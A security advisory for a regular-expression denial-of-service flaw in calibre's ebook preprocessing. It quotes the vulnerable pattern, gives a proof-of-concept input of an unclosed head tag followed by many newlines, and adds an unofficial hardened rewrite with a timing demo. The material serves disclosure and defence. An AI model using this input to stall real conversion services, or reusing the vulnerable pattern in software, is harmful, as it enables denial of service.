CVE-2021-44686: Regular Expression Denial-of-Service (ReDoS) in calibre
Description
calibre before 5.32.0 contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Proof of Concept
Vulnerable code: /src/calibre/ebooks/conversion/preprocess.py:383
To confirm that the regular expression is vulnerable, copy the snippet below into a separate file and run it; the match call takes a very long time to return because the engine backtracks over every way of splitting the newlines between the adjacent quantifiers.
import re
# Pattern from src/calibre/ebooks/conversion/preprocess.py: the adjacent `\n*`, `.*?` and `\n*` can all consume the same newlines, so with no `</head>` present the engine tries every split before giving up.
reg = re.compile(r'<head[^>]*>\n*(.*?)\n*</head>', re.IGNORECASE|re.DOTALL)
# An opening tag followed by many newlines and no closing tag triggers the backtracking; match() only returns None after a long delay.
reg.match('<head>' + '\n' * 1337)
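As an added example that is not part of the advisory and is not calibre's own fix, the pattern above is shown beside an unambiguous rewrite (my assumption of a safe form, not the upstream patch) that moves the newline trimming out of the regex; the helper names and the two sample documents are constructed for this demonstration.

```python
import re
import time

# The regular expression from the advisory (calibre before 5.32.0).
VULNERABLE = re.compile(r'<head[^>]*>\n*(.*?)\n*</head>', re.IGNORECASE | re.DOTALL)

# Hardened rewrite (an assumption, not calibre's fix): the three overlapping
# quantifiers `\n*`, `.*?` and `\n*` are replaced by a single lazy group and
# the surrounding newlines are stripped in Python. With one `.*?` there is
# only one way to consume each character, so an unterminated <head> is
# rejected after a linear scan instead of polynomial backtracking.
HARDENED = re.compile(r'<head[^>]*>(.*?)</head>', re.IGNORECASE | re.DOTALL)


def extract_head(html, pattern=HARDENED):
    """Return the <head> body with leading/trailing newlines trimmed, or None."""
    m = pattern.match(html)
    if m is None:
        return None
    return m.group(1).strip('\n')


def timed_match(pattern, text):
    """Run pattern.match(text) and return (matched, elapsed_seconds)."""
    start = time.perf_counter()
    m = pattern.match(text)
    return m is not None, time.perf_counter() - start


if __name__ == '__main__':
    # Constructed inputs: a well-formed document and the advisory's
    # unterminated one, sized so the vulnerable pattern still finishes.
    good = '<head lang="en">\n\n<title>x</title>\n</head><body/>'
    bad = '<head>' + '\n' * 300
    print('head body:', repr(extract_head(good)))
    for name, pat in (('vulnerable', VULNERABLE), ('hardened', HARDENED)):
        matched, secs = timed_match(pat, bad)
        print(f'{name:10s} matched={matched} {secs:.4f}s')
```

Both patterns extract the same head body from a well-formed document; only the hardened one rejects the unterminated input in linear time.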